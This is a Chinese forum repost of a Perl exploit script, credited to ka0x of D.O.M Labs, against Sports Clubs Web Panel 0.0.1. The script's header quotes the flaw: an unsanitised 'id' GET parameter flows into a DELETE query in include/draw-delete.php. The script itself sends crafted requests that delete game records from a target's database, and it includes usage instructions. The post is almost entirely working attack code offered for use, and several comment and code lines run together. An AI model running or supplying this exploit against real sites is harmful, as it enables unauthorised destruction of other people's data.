• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

    发布者: 404号房间 | 发布时间: 2025-6-28 22:44| 查看数: 104| 评论数: 0|帖子模式

    #!/usr/bin/perl -W# Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
    # File affected: include/draw-delete.php (id)# Vuln Code:# 06:  $did = $_GET['id'];
    # 08:  mysql_query("DELETE FROM draw WHERE did='$did'");# by ka0x <ka0x01 [at] gmail [dot] com>
    # D.O.M Labs - Security Researchers
    # - www.domlabs.org -
    ## ka0x@domlabs:~/codes$ ./sportspanel.pl http://localhost/sportspanel 3
    use LWP::UserAgent;my $host = $ARGV[0];
    my $did = $ARGV[1];die &_USAGE unless $ARGV[1];sub _USAGE
    {
    die "
    - Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit -
    - by ka0x (www.domlabs.org)usage: ./$0 <host> <valid_game_id>
    ex: ./$0 http://localhost/sportspanel 2
    ";
    }my $ua = LWP::UserAgent->new() or die;
    $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");my $req = HTTP::Request->new(GET => $host."/?p=draw-delete&id=".$did);
    my $res = $ua->request($req);
    my $con = $res->content;if ($res->is_success){
    if($con =~ /$did/){
    print "[ ] The Game \"$did\" has been deleted from the database!\n";
    }
    }else{
    print "[-] Exploit Failed!";
    }__END__


    来源:https://www.jb51.net/hack/5634.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表